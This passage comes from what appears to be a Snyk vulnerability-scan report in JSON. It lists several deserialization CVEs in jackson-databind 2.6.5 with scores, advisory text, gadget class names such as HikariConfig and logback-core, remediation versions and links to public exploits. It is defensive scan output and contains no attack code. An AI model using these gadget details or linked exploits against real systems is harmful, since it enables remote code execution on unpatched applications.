- }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html", - "title": "Debian Security Announcement" - }, - { - "url": "https://github.com/jas502n/CVE-2019-12384", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "title": "Github Fix" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2334", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Jackson CVEs Don't Panic - Blog" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x", - "title": "Release Notes" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-06T14:04:45.683422Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.645685Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.734463Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", - "epssDetails": { - "percentile": "0.97607", - "probability": "0.53288", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-12384" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-mph4-vhrx-mv67" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-06-25T10:06:54.889582Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-05-28T10:27:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - 
"maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-06-25T10:26:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.734463Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2387", - "title": "GitHub Issue" - 
}, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "assigner": "Red Hat", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.033731Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:45.849047Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.502907Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
`SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.83638", - "probability": "0.00984", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14379" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": 
"2019-07-29T14:55:33.030000Z", - "functions_new": [ - { - "version": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.502907Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - 
"moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2449", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.808389Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:54.800234Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:53.931793Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", - "epssDetails": { - "percentile": "0.71702", - "probability": "0.00342", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-16335" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-85cw-hj65-qqv9" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:06.837179Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:30:24Z", 
- "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:30:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:53.931793Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "credit": [ - "iSafeBlue" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Functional", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": 
"https://github.com/FasterXML/jackson-databind/issues/2410", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:42.892322Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:47.850814Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.008832Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", - "epssDetails": { - "percentile": "0.74104", - "probability": "0.00410", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14540" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h822-r4r5-v8jg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2019-09-16T13:03:10.401907Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr2)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-09-15T23:27:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Functional", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - 
"artifactId": "jackson-databind" - }, - "publicationTime": "2019-09-16T23:27:25Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.008832Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.10)", - "[2.7.0,2.8.11.5)", - "[,2.6.7.3)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10", - "2.8.11.5", - "2.6.7.3" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.10.0.pr1,2.10.0.pr2)", - "[,2.9.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2420", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": 